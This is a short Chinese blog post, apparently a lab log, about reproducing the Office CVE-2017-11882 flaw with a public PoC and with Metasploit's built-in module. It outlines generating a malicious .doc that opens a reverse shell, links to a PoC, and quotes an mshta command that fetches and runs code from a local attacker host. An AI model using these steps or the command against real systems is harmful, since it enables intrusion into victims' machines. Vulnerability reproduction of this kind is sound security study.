就不去介绍这个漏洞了,网上搜一大把的。下面直接放两个方式的截图以及简单讲解。
00X0利用网上的poc来复现
poc地址:https://www.cnblogs.com/i-honey/p/7885573.html
首先要把cve-2017-11882.rb文件复制到msf模块下
然后打开README.md,按照提示进行恶意doc的生成,其中有一个是用来弹计算器的。我们直接生成恶意doc,注意这里的地址要换成你自己主机的地址。
然后我们来使用我们添加的msf模块,设置参数,这里如果search不到新添加的模块可以使用:reload_all命令
然后运行,这里也显示失败的结果了。如果成功反弹shell输入sessions的时候会出现一个或者多个session。
失败的原因我想和下面这个错误有关。当我在本地cmd下运行【mshta.exe "http://192.168.40.22:8080/abc " 的时候也是出现系统找不到指定文件的错误。
00X01利用Metasploit自带exp
search模块,然后set参数,如图,当我在主机打开恶意doc时,直接出来下图内容,之前在网上看到一哥们说这是表示本机office没有漏洞,但是我利用弹计算器的测试doc能够成功弹出doc,说明本地office版本应该还是有漏洞的吧。
朋友说是我主机windows系统的原因,他在他本地也不能反弹,但是他在他windows虚拟机里面就可以。我也是母鸡了~
原文地址:http://blog.51cto.com/13539934/2103188